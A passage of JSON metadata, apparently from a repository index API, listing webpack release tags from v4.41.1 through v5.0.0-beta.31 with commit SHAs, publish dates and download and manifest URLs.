Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_p